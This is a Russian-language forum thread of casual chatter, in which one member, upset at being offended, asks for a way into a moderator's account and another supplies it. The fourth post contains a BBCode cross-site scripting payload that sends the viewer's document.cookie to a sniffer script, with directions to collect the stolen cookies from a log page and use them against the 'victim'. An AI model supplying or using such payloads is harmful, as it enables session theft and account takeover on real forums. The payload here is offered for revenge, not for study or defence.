White я понял =) Земляк ? На самом деле ромашка - злобный дядька, который мешает жить форуму!!! Вот он под видом милого существа, вроде ромашки пытается развести добреньких наивнейших ребят на пассы =)))
SpiderX что у тебя скачивание не работает? Скачивать да скачивает, но вот потом открываешь, и какие то проблемы..... И да Я в там родился.... Майор поймают так как Я там родился.....=) ромашка, Могу показать как это тебе зделать самой, пассворд тебе не нужен так как ты Модератора хочешь поиметь а не Админа. Только смотри там сильно не хулигань!! Вот когда будешь писать сообщение, вставь в него сейчас найду сниффер подожди.......
У мя с прогой все в порядке! Ты там галочки поставил при включении, что согласен с условиями создателей проги? Делайте как знаете =) Пошйду спать! Завтра в Универ =((( будь он неладен =)
Тем более ты в Гермнии!!! А ну стобой вообще разговаривать не будут!! Я в Германии тоже жил и у меня там Дядя живёт они помешены (Герамнци =) )какие то. Что небудь зделаешь и хана. Сеычас ищу подожди. 2 SpiderX твой арчайв не роспаковывается.
Когда качаешь твой фаил, открываешь и там какие то с фаилом проблемы. Не распаковывается. Рамашка на. Code: [COLОR=[IМG]http://aaa.aa/=`aaa.jpg[/IМG]]` style=background:url(javascript:document.images[1].src="/cgi-bin/s.jpg?"+document.cookie) [/COLОR] Вставь в сообщение, пусть твоя жертва на ниё посмотрит, пойдёшь сюда, /sniff/log.php и своруешь его кукиз.
White Jordan is да мне уже честно говоря наплевать что будет потом , обидели меня ооочень сильно и я просто обязана что-нибудь натворить
Рамашка звать White Jordan. "IS" по Инглешу, это тоже самое что и "IST" по Германски =) то есть "есть", находится. У всех мембаров тут это есть.
White Jordan is _ да сегодня я об этом тоже гдето читала., но я такая тупенькая в этом , но попробую конечно же. А может всё-таки скажите просто пароль, если можно. В долгу не останусь , чем смогу тоже помогу
Понял! Я реально не в курсе что с ним! =( Сам скачал и вроде все окей ! Лан все Баеньки =) Все пока!!! White с тобой скоро переговорим =)